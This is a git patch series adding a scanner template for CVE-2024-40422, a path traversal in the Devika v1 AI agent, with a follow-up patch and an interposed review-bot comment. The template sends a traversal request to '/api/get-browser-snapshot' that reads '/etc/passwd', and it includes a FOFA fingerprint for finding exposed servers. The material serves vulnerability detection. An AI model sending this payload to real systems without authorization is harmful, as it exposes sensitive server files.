From 8bdf26247378812785c51de3b6181ab9320523d4 Mon Sep 17 00:00:00 2001
From: Kazgangap
Date: Mon, 5 Aug 2024 20:49:38 +0300
Subject: [PATCH 1/2] add CVE-2024-40422
---
 http/cves/2024/CVE-2024-40422.yaml | 65 ++++++++++++++++++++++++++++++
 1 file changed, 65 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-40422.yaml
diff --git a/http/cves/2024/CVE-2024-40422.yaml b/http/cves/2024/CVE-2024-40422.yaml
new file mode 100644
index 0000000000..b72c8c6349
--- /dev/null
+++ b/http/cves/2024/CVE-2024-40422.yaml
@@ -0,0 +1,65 @@
+id: CVE-2024-40422
+
+info:
+ name: Devika v1 - Path Traversal
+ author: securityforeveryone,alpernae
+ severity: critical
+ description: |
+ The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-40422
+ - https://cvefeed.io/vuln/detail/CVE-2024-40422
+ - https://github.com/alpernae/CVE-2024-40422
+ - https://github.com/stitionai/devika
+ - https://www.exploit-db.com/exploits/52066
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+ cvss-score: 9.1
+ cve-id: CVE-2024-40422
+ cwe-id: CWE-22
+ epss-score: 0.0087
+ epss-percentile: 0.82513
+ cpe: cpe:2.3:a:stitionai:devika:1.0:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: stitionai
+ product: devika
+ fofa-query: icon_hash="-1429839495"
+ tags: cve,cve2024,devika,path-traversal
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ GET /api/data HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains_all(body,"models","projects","OPENAI","OLLAMA")'
+ - 'contains(content_type,"application/json")'
+ - 'status_code == 200'
+ condition: and
+ internal: true
+
+ - raw:
+ - |
+ GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - 'root:.*:0:0:'
+
+ - type: word
+ part: header
+ words:
+ - 'application/octet-stream'
+
+ - type: status
+ status:
+ - 200
From 15ac2b622dea2c0b72b4c08674cb715525a9e520 Mon Sep 17 00:00:00 2001
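Review bot: `max-request: 1` in `metadata` does not match the template's traffic: `flow: http(1) && http(2)` issues both raw requests (the `/api/data` fingerprint, then the `/api/get-browser-snapshot` probe), so the value should be `max-request: 2`. The `reference` list holds only advisory and PoC links; if a patched Devika release or upstream fix commit is known, adding it as a `remediation:` entry under `info` would let a defender act on a positive match, and `verified: true` in `metadata` would record that the check was confirmed against a live instance. Note also that the `../../../../etc/passwd` probe and the `root:.*:0:0:` regex only confirm the flaw on Unix-like hosts, so a non-match on a Windows deployment should not be read as "not vulnerable".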
From: Dhiyaneshwaran
Date: Tue, 6 Aug 2024 19:01:54 +0530
Subject: [PATCH 2/2] Update CVE-2024-40422.yaml
---
 http/cves/2024/CVE-2024-40422.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/http/cves/2024/CVE-2024-40422.yaml b/http/cves/2024/CVE-2024-40422.yaml
index b72c8c6349..450fad8d83 100644
--- a/http/cves/2024/CVE-2024-40422.yaml
+++ b/http/cves/2024/CVE-2024-40422.yaml
@@ -25,7 +25,7 @@ info:
 vendor: stitionai
 product: devika
 fofa-query: icon_hash="-1429839495"
- tags: cve,cve2024,devika,path-traversal
+ tags: cve,cve2024,devika,lfi
 flow: http(1) && http(2)
@@ -52,6 +52,7 @@ http:
 matchers-condition: and
 matchers:
 - type: regex
+ part: body
 regex:
 - 'root:.*:0:0:'